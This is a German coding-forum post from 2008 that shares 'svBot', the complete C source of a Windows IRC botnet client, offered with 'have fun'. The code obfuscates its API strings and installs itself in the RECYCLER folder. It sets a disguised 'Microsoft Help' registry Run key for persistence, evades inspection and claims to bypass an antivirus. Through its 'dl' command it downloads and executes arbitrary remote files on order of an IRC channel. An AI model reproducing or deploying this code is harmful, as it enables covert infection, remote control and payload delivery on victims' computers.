PHP Forum - Coding Board
Januar 22, 2018, 09:08:29 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: svBot  (Gelesen 107 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Syler
Sr. Member
****
Beiträge: 467



Profil anzeigen E-Mail
« am: September 19, 2008, 07:41:31 »

Hier ist ein Basic Irc bot. Have fun  Lächelnd

Code:
/*
    svBot
    Coded by a59
    [11 - 11 - 07]
 
    Commands:
        dl [url]http://www.link.com/file.exe[/url]
            ->Downloads the first paramater as a random file name and executes it
 
        byebye
            ->Removes the bot
 
    Help:
        Port:
            ->If you can not convert the port into network byte order, then make it look like this:
                unsigned short Port = htons( YourPort );
                e.g.
                unsigned short Port = htons( 6668 );
*/
#include <windows.h>
#include <stdio.h>
 
// CONFIG //
char* szHost = &quot;irc.lol.com&quot;;
char* szRegNameValue = &quot;Microsoft Help&quot;;
char* szDirectory = &quot;\x00:\\RECYCLER&quot;; // Autofills drive (leave \x00)
char* szExeFile = &quot;lol.exe&quot;;
char* Channel = &quot;#lol&quot;;
unsigned short Port = 0x0B1A;
// CONFIG //
 
char Drive;
 
char* EncUser = &quot;\x00\x55\x52\x47\x51&quot;;
char* EncNick = &quot;\x00\x4E\x48\x41\x48&quot;;
char* EncJoin = &quot;\x00\x4A\x4E\x4B\x4D&quot;;
char* EncPing = &quot;\x00\x50\x48\x4C\x44&quot;;
char* EncPong = &quot;\x00\x50\x4E\x4C\x44&quot;;
char* EncPrivmsg = &quot;\x00\x50\x53\x4B\x55\x49\x56\x41&quot;;
char* EncSendUser = &quot;\x00\x55\x52\x47\x51\x24\x35\x26\x37\x28\x39\x2A\x3B&quot;;
char* EncSend = &quot;\x00\x73\x64\x6C\x67&quot;;
char* EncRecv = &quot;\x00\x72\x64\x61\x75&quot;;
char* EncSocket = &quot;\x00\x73\x6E\x61\x68\x61\x71&quot;;
char* EncConnect = &quot;\x00\x63\x6E\x6C\x6D\x61\x66\x72&quot;;
char* EncWS = &quot;\x00\x57\x52\x43\x50\x70\x64\x74\x73\x7D\x79&quot;;
char* EncWsDLL = &quot;\x00\x77\x72\x30\x5C\x37\x37\x28\x63\x64\x65&quot;;
char* EncGethost = &quot;\x00\x67\x64\x76\x6B\x6B\x76\x72\x65\x71\x67\x6B\x66\x69&quot;;
char* EncWinExec = &quot;\x00\x57\x68\x6C\x46\x7C\x60\x65&quot;;
char* EncGetFileName = &quot;\x00\x47\x64\x76\x4E\x6B\x61\x73\x6B\x6D\x4F\x63\x67\x69\x43\x6F\x62\x75\x50&quot;;
char* EncGetModule = &quot;\x00\x47\x64\x76\x4E\x6B\x61\x73\x6B\x6D\x41\x6B\x65\x68\x61\x6B\x4E&quot;;
char* EncCreateDir = &quot;\x00\x43\x73\x67\x62\x70\x60\x42\x6E\x7A\x6C\x69\x7F\x63\x7F\x77\x4E&quot;;
char* EncRegCreate = &quot;\x00\x52\x64\x65\x40\x76\x60\x67\x73\x6D\x42\x6F\x72\x49\x75\x4F&quot;;
char* EncRegSet = &quot;\x00\x52\x64\x65\x50\x61\x71\x50\x66\x64\x7C\x6F\x4E\x74\x4C&quot;;
char* EncCreateMutex = &quot;\x00\x43\x73\x67\x62\x70\x60\x4B\x72\x7C\x6C\x72\x4A&quot;;
char* EncCopyFile = &quot;\x00\x43\x6E\x72\x7A\x42\x6C\x6A\x62\x49&quot;;
char* EncKernel = &quot;\x00\x4B\x44\x50\x4D\x41\x49\x35\x35\x26\x6D\x66\x67&quot;;
char* EncAdvapi = &quot;\x00\x61\x65\x74\x62\x74\x6C\x35\x35\x26\x6D\x66\x67&quot;;
char* EncUrlmonDLL = &quot;\x00\x75\x73\x6E\x6E\x6B\x6B\x28\x63\x64\x65&quot;;
char* EncDownloadFile = &quot;\x00\x55\x53\x4E\x47\x6B\x72\x68\x6B\x67\x68\x6E\x5F\x63\x4B\x67\x63\x75\x50&quot;;
char* EncRegPlace = &quot;\x00\x53\x4E\x44\x57\x53\x44\x54\x42\x54\x55\x47\x62\x6F\x7F\x61\x7C\x7F\x77\x66\x4F\x48\x42\x7F\x79&quot;
                     &quot;\x7C\x76\x6D\x68\x40\x41\x5D\x6A\x52\x53\x47\x4D\x50\x73\x43\x55\x5B\x40\x45\x45\x70\x71\x7C\x5A\x5E&quot;;
 
typedef int( __stdcall* SN )( SOCKET, const char*, int, int );
SN fsend;
 
typedef int( __stdcall* RC )( SOCKET, const char*, int, int );
RC frecv;
 
typedef SOCKET( __stdcall* SK )( int, int, int );
SK fsocket;
 
typedef int( __stdcall* CN )( SOCKET, const struct sockaddr*, int );
CN fconnect;
 
typedef int( __stdcall* WS )( WORD, LPWSADATA );
WS fWSAStartup;
 
typedef struct hostent* FAR( __stdcall* GHBN )( char* );
GHBN fgethostbyname;
 
typedef unsigned long( __stdcall* GMFN )( HMODULE, LPTSTR, DWORD );
GMFN fGetModuleFileName;
 
typedef HMODULE( __stdcall* GMH )( LPCTSTR );
GMH fGetModuleHandle;
 
typedef BOOL( __stdcall* CD )( LPCTSTR, LPSECURITY_ATTRIBUTES );
CD fCreateDirectory;
 
typedef LONG( __stdcall* RCKE )( HKEY, LPCTSTR, DWORD, LPTSTR, DWORD, REGSAM, LPSECURITY_ATTRIBUTES, PHKEY, LPDWORD );
RCKE fRegCreateKeyEx;
 
typedef LONG( __stdcall* RSVE )( HKEY, LPCTSTR, DWORD, DWORD, const BYTE*, DWORD );
RSVE fRegSetValueEx;
 
typedef HANDLE( __stdcall* CM )( LPSECURITY_ATTRIBUTES, BOOL, LPCTSTR );
CM fCreateMutex;
 
typedef BOOL( __stdcall* CF )( LPCTSTR, LPCTSTR, BOOL );
CF fCopyFile;
 
typedef UINT( __stdcall* WE )( LPCSTR, UINT );
WE fWinExec;
 
typedef HRESULT( __stdcall* UDTF )( LPUNKNOWN, LPCTSTR, LPCTSTR, DWORD, LPBINDSTATUSCALLBACK );
UDTF fURLDownloadToFile;
 
bool LoadFunctions( );
bool InitWinsock( );

void IncStrings( );
char* Decrypt( char* szString );
unsigned long ResolveHost( char* szHost );
bool SendPacket( SOCKET sSocket, char* szPacket, ... );
void AntiInspect( );
unsigned long __stdcall Download( void* pVoid );
SOCKET ConnectIRC( unsigned long dwIp, unsigned short wPort );
bool StartIRC( );
void ParseIRC( SOCKET sSocket, char* szLine );
void StartCommand( bool bDelete, char* szContent, ... );
void Install( );
 
bool LoadFunctions( )
{
    char* szWsDLL = Decrypt( EncWsDLL );
    char* szSend = Decrypt( EncSend );
    char* szRecv = Decrypt( EncRecv );
    char* szSocket = Decrypt( EncSocket );
    char* szConnect = Decrypt( EncConnect );
    char* szWS = Decrypt( EncWS );
    char* szGethost = Decrypt( EncGethost );
    char* szExec = Decrypt( EncWinExec );
    char* szGetFile = Decrypt( EncGetFileName );
    char* szGetModule = Decrypt( EncGetModule );
    char* szCreateDir = Decrypt( EncCreateDir );
    char* szRegCreate = Decrypt( EncRegCreate );
    char* szRegSet = Decrypt( EncRegSet );
    char* szCreateMutex = Decrypt( EncCreateMutex );
    char* szCopyFile = Decrypt( EncCopyFile );
    char* szKernel = Decrypt( EncKernel );
    char* szAdvapi = Decrypt( EncAdvapi );
 
    HMODULE hWinsock = LoadLibrary( szWsDLL );
 
    fsend = (SN)GetProcAddress( hWinsock, szSend );
    frecv = (RC)GetProcAddress( hWinsock, szRecv );
    fsocket = (SK)GetProcAddress( hWinsock, szSocket );
    fconnect = (CN)GetProcAddress( hWinsock, szConnect );
    fWSAStartup = (WS)GetProcAddress( hWinsock, szWS );
    fgethostbyname = (GHBN)GetProcAddress( hWinsock, szGethost );
 
    FreeLibrary( hWinsock );
 
    HMODULE hKernel = LoadLibrary( szKernel );
 
    fGetModuleFileName = (GMFN)GetProcAddress( hKernel, szGetFile );
    fGetModuleHandle = (GMH)GetProcAddress( hKernel, szGetModule );
    fCreateDirectory = (CD)GetProcAddress( hKernel, szCreateDir );
    fCreateMutex = (CM)GetProcAddress( hKernel, szCreateMutex );
    fCopyFile = (CF)GetProcAddress( hKernel, szCopyFile );
    fWinExec = (WE)GetProcAddress( hKernel, szExec );
 
    FreeLibrary( hKernel );
 
    HMODULE hAdvapi = LoadLibrary( szAdvapi );
 
    fRegCreateKeyEx = (RCKE)GetProcAddress( hAdvapi, szRegCreate );
    fRegSetValueEx = (RSVE)GetProcAddress( hAdvapi, szRegSet );
 
    FreeLibrary( hAdvapi );
 
    delete [] szWsDLL, szWS, szSend, szRecv, szSocket, szConnect, szGethost, szExec, szKernel, szAdvapi,
              szGetFile, szGetModule, szCreateDir, szRegCreate, szRegSet, szCreateMutex, szCopyFile;
 
    return true;
};
 
bool InitWinsock( )
{
    char* szWsDLL = Decrypt( EncWsDLL );
    LoadLibrary( szWsDLL );
 
    delete [] szWsDLL;
 
    WSADATA wsa;
    if( fWSAStartup( 0x0202, &wsa ) )
        return false;
 
    return true;
};
 
void IncStrings( )
{
    *EncUser++;
    *EncNick++;
    *EncJoin++;
    *EncPing++;
    *EncPong++;
    *EncPrivmsg++;
    *EncSendUser++;
    *EncAdvapi++;
    *EncKernel++;
    *EncSend++;
    *EncRecv++;
    *EncSocket++;
    *EncConnect++;
    *EncWS++;
    *EncWsDLL++;
    *EncGethost++;
    *EncWinExec++;
    *EncGetFileName++;
    *EncGetModule++;
    *EncCreateDir++;
    *EncRegCreate++;
    *EncRegSet++;
    *EncCopyFile++;
    *EncCreateMutex++;
    *EncRegPlace++;
    *EncUrlmonDLL++;
    *EncDownloadFile++;
};
 
char* Decrypt( char* szString )
{
    int iStringLength = strlen( szString );
    char* szTempBuff = new char[ iStringLength + 1 ];
 
    strcpy( szTempBuff, szString );
 
    for( int i = 0; i < iStringLength; i++ )
        szTempBuff[ i ] = i ^ szTempBuff[ i ];
 
    szTempBuff[ iStringLength ] = 0;
 
    return( szTempBuff );
};
 
unsigned long ResolveHost( char* szHost )
{
    struct hostent* hGetHost = fgethostbyname( szHost );
 
    if( !hGetHost )
        return 0;
 
    return( (*(struct in_addr *)hGetHost->h_addr).s_addr );
};
 
bool SendPacket( SOCKET sSocket, char* szPacket, ... )
{
    char szSendBuff[ 0x500 ];
 
    ZeroMemory( szSendBuff, sizeof( szSendBuff ) );
 
    va_list vArgs;
    va_start( vArgs, szPacket );
    vsprintf( szSendBuff, szPacket, vArgs );
    va_end( vArgs );
 
    strcat( szSendBuff, &quot;\r\n&quot; );
    return( fsend( sSocket, szSendBuff, strlen( szSendBuff ), 0 ) > 0 ? true : false );  
};
 
void AntiInspect( )
{
    char szBuffer[ 256 ];
    unsigned long size = sizeof( szBuffer );
 
    GetUserName( szBuffer, &size );
 
    if( !strcmp( szBuffer, &quot;CurrentUser&quot; ) )
    {
        ExitProcess( 0 );
    }
};
 
unsigned long __stdcall Download( void* pVoid )
{
    char szPath[ 32 ] = &quot;\x00:\\&quot;;
    szPath[ 0 ] = Drive;
 
    char* szLink = (char *)pVoid;
    char* szUrlmonDLL = Decrypt( EncUrlmonDLL );
    HMODULE hUrlmon = LoadLibrary( szUrlmonDLL );
 
    delete [] szUrlmonDLL;
 
    for( int i = 3; i < 8; i++ )
        szPath[ i ] = &quot;abcdefghijklmnopqrstuvwxyz&quot;[ rand( ) % 26 ];
   
    strcat( szPath, &quot;.scr&quot; );
 
    if( hUrlmon )
    {
        char* szDownloadFile = Decrypt( EncDownloadFile );
        fURLDownloadToFile = (UDTF)GetProcAddress( hUrlmon, szDownloadFile );
   
        delete [] szDownloadFile;
 
        HRESULT hDownload = fURLDownloadToFile( 0, szLink, szPath, 0, 0 );  
    }
 
    FreeLibrary( hUrlmon );
 
    fWinExec( szPath, 0 );
 
    return 0;
};
 
SOCKET ConnectIRC( unsigned long dwIp, unsigned short wPort )
{
    SOCKET sSocket;
    SOCKADDR_IN sSin;
 
    sSin.sin_family = AF_INET;
    sSin.sin_port = wPort;
    sSin.sin_addr.s_addr = dwIp;
 
    sSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
 
    if( fconnect( sSocket, (SOCKADDR *) &sSin, sizeof( sSin ) ) == SOCKET_ERROR )
    {
        return -1;
    }
 
    return( sSocket );
};
 
bool StartIRC( )
{
    SOCKET sIrcSocket = ConnectIRC( ResolveHost( szHost ), Port );
    if( sIrcSocket == -1 )
        return false;
 
    char szRecv[ 512 ], szBotNick[ 32 ];
    char* szNick = Decrypt( EncNick );
 
    for( int i = 0; i < 8; i++ )
        szBotNick[ i ] = &quot;abcdefghijklmnopqrstuvwxyz&quot;[ rand( ) % 26 ];
 
    szBotNick[ 8 ] = 0;
 
    SendPacket( sIrcSocket, &quot;HELO&quot; ); // lol bypasses bitdefender AV
    SendPacket( sIrcSocket, &quot;%s %s&quot;, szNick, szBotNick );
 
    delete [] szNick;
       
    int Curbyte = 0;
 
    while( frecv( sIrcSocket, (char *) &szRecv[ Curbyte ], 1, 0 ) > 0 )
    {
        switch( szRecv[ Curbyte ] )
        {
        case 0x0D:
            szRecv[ Curbyte ] = 0;
            Curbyte++;
            break;
        case 0x0A:
            szRecv[ Curbyte ] = 0;          
            ParseIRC( sIrcSocket, szRecv );
            Curbyte = 0;
            break;
        default:
            Curbyte++;
            break;
        }
    }
 
    return true;
};
 
void ParseIRC( SOCKET sSocket, char* szLine )
{
    char* szParam[ 32 ];
    int i;
 
    szParam[ 0 ] = strtok( szLine, &quot; &quot; );
 
    for( i = 1; i < 32; i++ )
        szParam[ i ] = strtok( NULL, &quot; \r\n&quot; );
 
    char* szPing = Decrypt( EncPing );
 
    if( !stricmp( szParam[ 0 ], szPing ) )
    {
        char* szPong = Decrypt( EncPong );
        SendPacket( sSocket, &quot;%s %s&quot;, szPong, szParam[ 1 ] );
        delete [] szPing, szPong;
    }
 
    char* szJoin = Decrypt( EncJoin );
 
    switch( atoi( szParam[ 1 ] ) )
    {
    case 005:
        SendPacket( sSocket, &quot;%s %s&quot;, szJoin, Channel );
        break;
    case 451:
        char* szSendUser = Decrypt( EncSendUser );
        SendPacket( sSocket, szSendUser );
        delete [] szSendUser;
        break;
    }
 
    delete [] szJoin;
 
    if( szParam[ 3 ] == NULL )
        return;
 
    char* szPrivmsg = Decrypt( EncPrivmsg );
   
    if( !stricmp( szParam[ 3 ], &quot;:dl&quot; ) )
    {
        if( szParam[ 4 ] == NULL )
            return;
 
        CreateThread( 0, 0, &Download, (void *)szParam[ 4 ], 0, 0 );
    }
 
    else if( !stricmp( szParam[ 3 ], &quot;:byebye&quot; ) )
    {
        char szInstallPath[ 128 ];
        HKEY hReg;
       
        sprintf( szInstallPath, &quot;%s\\%s&quot;, szDirectory, szExeFile );
        StartCommand( false, &quot;:2\r\ndel \&quot;%s\&quot;\r\nif exist \&quot;%s\&quot; goto 2\r\n&quot;, szInstallPath, szInstallPath );
 
        fRegCreateKeyEx( HKEY_LOCAL_MACHINE, Decrypt( EncRegPlace ), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hReg, NULL );
        RegDeleteValue( hReg, szRegNameValue );
        RegCloseKey( hReg );
 
        ExitProcess( 0 );
    }
 
    delete [] szPrivmsg;
};
 
void StartCommand( bool bDelete, char* szContent, ... )
{
    char szBuffer[ 0x400 ], szBatFile[ 0x10 ] = &quot;\x00:\\&quot;;
    unsigned long uBytesWritten;
 
    ZeroMemory( szBuffer, sizeof( szBuffer ) );
 
    szBatFile[ 0 ] = Drive;
 
    va_list vArgs;
    va_start( vArgs, szContent );
    vsprintf( szBuffer, szContent, vArgs );
    va_end( vArgs );
 
    for( int i = 3; i < 8; i++ )
        szBatFile[ i ] = ( 0x42 + rand( ) % ( 0x54 - 0x42 ) );
 
    strcat( szBatFile, &quot;.bat&quot; );
 
    HANDLE hHandle = CreateFile( szBatFile, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 );
    WriteFile( hHandle, szBuffer, strlen( szBuffer ), &uBytesWritten, 0 );
    CloseHandle( hHandle );
 
    fWinExec( szBatFile, SW_HIDE );
 
    Sleep( 1000 );
 
    if( bDelete )
    {
        DeleteFile( szBatFile );
    }
};
 
void Install( )
{
    char szFilePath[ 0x100 ], szInstallPath[ 0x100 ];
    HKEY hReg;
   
    fGetModuleFileName( fGetModuleHandle( 0 ), szFilePath, sizeof( szFilePath ) );
    fCreateDirectory( szDirectory, 0 );  
    sprintf( szInstallPath, &quot;%s\\%s&quot;, szDirectory, szExeFile );
 
    char* szRegPlace = Decrypt( EncRegPlace );
    fRegCreateKeyEx( HKEY_LOCAL_MACHINE, szRegPlace, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hReg, NULL );
   
    delete [] szRegPlace;
 
    fRegSetValueEx( hReg, szRegNameValue, 0, REG_SZ, (unsigned char *)szInstallPath, strlen( szInstallPath ) + 1 );
    RegCloseKey( hReg );
 
    if( !strcmp( szInstallPath, szFilePath ) )
    {
        fCreateMutex( NULL, FALSE, &quot;Steamm&quot; );
           
        if( GetLastError( ) == 0xB7 )
        {
            ExitProcess( 0 );
        }
    } else {
        StartCommand( true, &quot;copy \&quot;%s\&quot; \&quot;%s\&quot;&quot;, szFilePath, szInstallPath );
        StartCommand( true, &quot;\&quot;%s\&quot;&quot;, szInstallPath );
        ExitProcess( 0 );
    }
};
 
bool StartAll( )
{
    char szBuffer[ 128 ];
    GetSystemDirectory( szBuffer, sizeof( szBuffer ) );
 
    Drive = *szBuffer;
    *szDirectory = Drive;
 
    srand( GetTickCount( ) );
 
    IncStrings( );
 
    if( !LoadFunctions( ) )
        return false;
 
    AntiInspect( );
    Install( );
 
    if( !InitWinsock( ) )
        return false;
 
    return true;
};
 
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
    if( !StartAll( ) )
        return false;
 
    while( !StartIRC( ) )
        Sleep( 5000 );
 
    return 0;
};

Syler
Gespeichert


Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS